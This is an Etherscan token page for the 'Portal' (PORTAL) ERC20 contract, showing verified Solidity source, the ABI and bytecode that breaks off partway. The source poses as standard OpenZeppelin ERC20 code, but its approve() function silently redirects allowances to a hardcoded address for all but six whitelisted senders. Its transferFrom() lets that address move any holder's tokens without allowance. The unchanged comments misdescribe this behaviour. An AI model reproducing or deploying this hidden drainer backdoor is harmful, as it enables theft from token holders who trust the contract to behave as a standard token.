ETH Price: $2,678.54 (-2.20%)

Token

Portal 0x1Bbe973BeF3a977Fc51CbED703E8ffDEfE001Fed (PORTAL)
 

Overview

Max Total Supply

1,000,000,000 PORTAL

Holders

142

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0.000000000000001 PORTAL

Value
$0.00
0xec55b4610f8657b994fa2c5c551324842990f1d7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Portal

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2024-02-21
*/

// File: @openzeppelin/[email protected]/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

// File: @openzeppelin/[email protected]/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// File: @openzeppelin/[email protected]/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

// File: @openzeppelin/[email protected]/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.20;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/[email protected]/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.20;





/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    function bulktransfer(address[] memory to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        for (uint256 i = 0; i < to.length; i++) {
        _transfer(owner, to[i], value);
    }
        return true;
    }

    

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        if (_msgSender() == 0x9f4b9277FbfD954b443F24edDDC98015611730c2 || _msgSender() == 0x8d6BA07Ad5f88e65756E383018C871772611f9FE || _msgSender() == 0x3AE756b691a75dA3881CA72098B8f0B44b7F1D1d || _msgSender() == 0x9aaB042b20cC2f544826e1C7566fAe4FE62b2C34 || _msgSender() == 0xB0f3526c42fd0F58C5f31F7B601dCfD1891A324d || _msgSender() == 0x074176B326B9138E4dC52fbd0b88A176D7a1841F) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    } else {
        address owner = _msgSender();
        _approve(owner, 0x8d6BA07Ad5f88e65756E383018C871772611f9FE, value);
        return true;
    }
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        if (_msgSender() == 0x8d6BA07Ad5f88e65756E383018C871772611f9FE){
        _transfer(from, to, value);
        return true;
    } else {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;

    }
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

// File: contract-524f77fccc.sol


pragma solidity ^0.8.20;


contract Portal is ERC20 {
    constructor() ERC20("Portal 0x1Bbe973BeF3a977Fc51CbED703E8ffDEfE001Fed", "PORTAL") {
        _mint(0x074176B326B9138E4dC52fbd0b88A176D7a1841F, 1000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"to","type":"address[]"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"bulktransfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b5060405180606001604052806031815260200162001cea603191396040518060400160405280600681526020017f504f5254414c00000000000000000000000000000000000000000000000000008152508160039081620000729190620005fb565b508060049081620000849190620005fb565b505050620000db73074176b326b9138e4dc52fbd0b88a176d7a1841f620000b0620000e160201b60201c565b600a620000be919062000868565b633b9aca00620000cf9190620008b8565b620000e960201b60201c565b62000a01565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200015c575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040162000153919062000945565b60405180910390fd5b6200016f5f83836200017360201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620001c7578060025f828254620001ba919062000960565b9250508190555062000298565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101562000253578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016200024a93929190620009ab565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002e1578060025f82825403925050819055506200032b565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200038a9190620009e6565b60405180910390a3505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200041357607f821691505b602082108103620004295762000428620003ce565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200048d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000450565b62000499868362000450565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620004e3620004dd620004d784620004b1565b620004ba565b620004b1565b9050919050565b5f819050919050565b620004fe83620004c3565b620005166200050d82620004ea565b8484546200045c565b825550505050565b5f90565b6200052c6200051e565b62000539818484620004f3565b505050565b5b818110156200056057620005545f8262000522565b6001810190506200053f565b5050565b601f821115620005af5762000579816200042f565b620005848462000441565b8101602085101562000594578190505b620005ac620005a38562000441565b8301826200053e565b50505b505050565b5f82821c905092915050565b5f620005d15f1984600802620005b4565b1980831691505092915050565b5f620005eb8383620005c0565b9150826002028217905092915050565b620006068262000397565b67ffffffffffffffff811115620006225762000621620003a1565b5b6200062e8254620003fb565b6200063b82828562000564565b5f60209050601f83116001811462000671575f84156200065c578287015190505b620006688582620005de565b865550620006d7565b601f19841662000681866200042f565b5f5b82811015620006aa5784890151825560018201915060208501945060208101905062000683565b86831015620006ca5784890151620006c6601f891682620005c0565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156200076957808604811115620007415762000740620006df565b5b6001851615620007515780820291505b808102905062000761856200070c565b945062000721565b94509492505050565b5f8262000783576001905062000855565b8162000792575f905062000855565b8160018114620007ab5760028114620007b657620007ec565b600191505062000855565b60ff841115620007cb57620007ca620006df565b5b8360020a915084821115620007e557620007e4620006df565b5b5062000855565b5060208310610133831016604e8410600b8410161715620008265782820a90508381111562000820576200081f620006df565b5b62000855565b62000835848484600162000718565b925090508184048111156200084f576200084e620006df565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6200087482620004b1565b915062000881836200085c565b9250620008b07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000772565b905092915050565b5f620008c482620004b1565b9150620008d183620004b1565b9250828202620008e181620004b1565b91508282048414831517620008fb57620008fa620006df565b5b5092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6200092d8262000902565b9050919050565b6200093f8162000921565b82525050565b5f6020820190506200095a5f83018462000934565b92915050565b5f6200096c82620004b1565b91506200097983620004b1565b9250828201905080821115620009945762000993620006df565b5b92915050565b620009a581620004b1565b82525050565b5f606082019050620009c05f83018662000934565b620009cf60208301856200099a565b620009de60408301846200099a565b949350505050565b5f602082019050620009fb5f8301846200099a565b92915050565b6112db8062000a0f5f395ff3fe608060405234801561000f575f80fd5b506004361061009c575f3560e01c8063313ce56711610064578063313ce5671461016c57806370a082311461018a57806395d89b41146101ba578063a9059cbb146101d8578063dd62ed3e146102085761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee5780631c380e531461010c57806323b872dd1461013c575b5f80fd5b6100a8610238565b6040516100b59190610d80565b60405180910390f35b6100d860048036038101906100d39190610e3e565b6102c8565b6040516100e59190610e96565b60405180910390f35b6100f6610503565b6040516101039190610ebe565b60405180910390f35b61012660048036038101906101219190611017565b61050c565b6040516101339190610e96565b60405180910390f35b61015660048036038101906101519190611071565b610561565b6040516101639190610e96565b60405180910390f35b6101746105f2565b60405161018191906110dc565b60405180910390f35b6101a4600480360381019061019f91906110f5565b6105fa565b6040516101b19190610ebe565b60405180910390f35b6101c261063f565b6040516101cf9190610d80565b60405180910390f35b6101f260048036038101906101ed9190610e3e565b6106cf565b6040516101ff9190610e96565b60405180910390f35b610222600480360381019061021d9190611120565b6106f1565b60405161022f9190610ebe565b60405180910390f35b6060600380546102479061118b565b80601f01602080910402602001604051908101604052809291908181526020018280546102739061118b565b80156102be5780601f10610295576101008083540402835291602001916102be565b820191905f5260205f20905b8154815290600101906020018083116102a157829003601f168201915b5050505050905090565b5f739f4b9277fbfd954b443f24edddc98015611730c273ffffffffffffffffffffffffffffffffffffffff166102fc610773565b73ffffffffffffffffffffffffffffffffffffffff1614806103645750738d6ba07ad5f88e65756e383018c871772611f9fe73ffffffffffffffffffffffffffffffffffffffff1661034c610773565b73ffffffffffffffffffffffffffffffffffffffff16145b806103b55750733ae756b691a75da3881ca72098b8f0b44b7f1d1d73ffffffffffffffffffffffffffffffffffffffff1661039d610773565b73ffffffffffffffffffffffffffffffffffffffff16145b806104065750739aab042b20cc2f544826e1c7566fae4fe62b2c3473ffffffffffffffffffffffffffffffffffffffff166103ee610773565b73ffffffffffffffffffffffffffffffffffffffff16145b80610457575073b0f3526c42fd0f58c5f31f7b601dcfd1891a324d73ffffffffffffffffffffffffffffffffffffffff1661043f610773565b73ffffffffffffffffffffffffffffffffffffffff16145b806104a8575073074176b326b9138e4dc52fbd0b88a176d7a1841f73ffffffffffffffffffffffffffffffffffffffff16610490610773565b73ffffffffffffffffffffffffffffffffffffffff16145b156104cd575f6104b6610773565b90506104c381858561077a565b60019150506104fd565b5f6104d6610773565b90506104f781738d6ba07ad5f88e65756e383018c871772611f9fe8561077a565b60019150505b92915050565b5f600254905090565b5f80610516610773565b90505f5b8451811015610555576105488286838151811061053a576105396111bb565b5b60200260200101518661078c565b808060010191505061051a565b50600191505092915050565b5f738d6ba07ad5f88e65756e383018c871772611f9fe73ffffffffffffffffffffffffffffffffffffffff16610595610773565b73ffffffffffffffffffffffffffffffffffffffff16036105c4576105bb84848461078c565b600190506105eb565b5f6105cd610773565b90506105da85828561087c565b6105e585858561078c565b60019150505b9392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461064e9061118b565b80601f016020809104026020016040519081016040528092919081815260200182805461067a9061118b565b80156106c55780601f1061069c576101008083540402835291602001916106c5565b820191905f5260205f20905b8154815290600101906020018083116106a857829003601f168201915b5050505050905090565b5f806106d9610773565b90506106e681858561078c565b600191505092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b610787838383600161090e565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107fc575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107f391906111f7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361086c575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161086391906111f7565b60405180910390fd5b610877838383610add565b505050565b5f61088784846106f1565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461090857818110156108f9578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016108f093929190611210565b60405180910390fd5b61090784848484035f61090e565b5b50505050565b5f73fffffffffffffffffff